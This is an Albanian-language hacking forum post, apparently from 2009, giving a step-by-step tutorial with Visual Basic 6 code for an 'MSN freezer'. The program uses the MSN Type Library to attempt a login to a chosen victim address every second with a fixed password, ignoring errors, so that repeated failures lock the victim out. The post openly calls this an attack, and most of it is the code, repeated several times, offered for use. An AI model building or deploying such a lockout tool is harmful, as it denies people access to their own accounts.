Ahg Security Albanian Hackers Group & Al-hosting.com
Welocme---------Mirese Erdhet

ahg-security

Mirse erdhet ne forumin tone,shpresoj tia kaloni sa me mire
,,Ju lutem regjistrohuni....
Ne kete forum do tia kaloni shume mire dhe shpresojme tju pelqeje sa me shume
ne jemi munduar qe tju krijojme kushte qe te ndiheni sa me mire ne kete forum


Si ta krijoni ni msn freezer

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë

Si ta krijoni ni msn freezer

Mesazh  jurg3n prej Fri Aug 21, 2009 1:31 pm

Si ta krijoni ni msn freezer
--------------------------------------------------------------------------------

e hapim ni standard exe
shkojm Tek Project > Referencesaty e lypim MSN Type Library e klickojm at the tani shtypim ok

Qka na duhet?
na duhen ni Textbox, ni timer dhe 2 Command Buttons

Tani shkojm keshtu:
klikojm tek timeri dhe e qesim Timer1.Enabled = False



Kodi:

Dim msn as NewMsgrObject

Pra kjo ashte Msn Type library qe e shtypem ma heret...

Tani klickojm dy her tek CommandButton 1 the shkojm tek kodi:


Kodi:

Private Sub Command1_Click ()
Timer1.Enabled = True
End Sub

kur te shtypsh buttonin freezer ja nis punon

Tani Per te ndaler Sulmin shkojm keshtu:



Kodi:

Private Sub Command2_Click ()
Timer1.Enabled = False
End Sub

Tani e hapim Formin:


Kodi:

Private Sub Form_Load
Timer1.Interval = 1000
Timer1.Enabled = False
End Sub

pra me interval asht 1 sekund pra qdo 1 sekund e provon ni password ne at email.

tani e shtypim 2 her Timerin dhe hapet codi:


Kodi:

Private Sub Timer1.Timer ()
On Error Resume Next
msn.logon Text1.Text, "123456", msn.Services.PrimaryService
End Sub

ketu i tregojm programmit se ne qoft se dalin Errora me vazhdu. dhe me msn.logon provojm me ba login ne msn...




Dim msn as NewMsgrObject - pra ky se pari vjen tek scourci per te par scourcin vetem shko tek View tani Code

Private Sub Command1_Click ()
Timer1.Enabled = True
End Sub

Private Sub Command2_Click ()
Timer1.Enabled = False
End Sub

Private Sub Form_Load
Timer1.Interval = 1000
Timer1.Enabled = False
End Sub

Private Sub Timer1.Timer ()
On Error Resume Next
msn.logon Text1.Text, "123456", msn.Services.PrimaryService
End Sub






kjo asht per Button ni pra per me fillu programmi



Kodi:

Private Sub Command1_Click ()
Timer1.Enabled = True
End Sub
kjo asht per me nal per kommand button nr 2



Kodi:

Private Sub Command2_Click ()
Timer1.Enabled = False
End Sub
kta e shton tek form1



Kodi:

Private Sub Form_Load
Timer1.Interval = 1000
Timer1.Enabled = False
End Sub
dhe kta e qet tek timeri pra klikon 2 her tek timeri



Kodi:

Private Sub Timer1.Timer ()
On Error Resume Next
msn.logon Text1.Text, "123456", msn.Services.PrimaryService
End Sub

_________________
HaCkED by 4saken

jurg3n
Admin
Admin

Numri i postimeve : 776
Join date : 14/08/2009

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi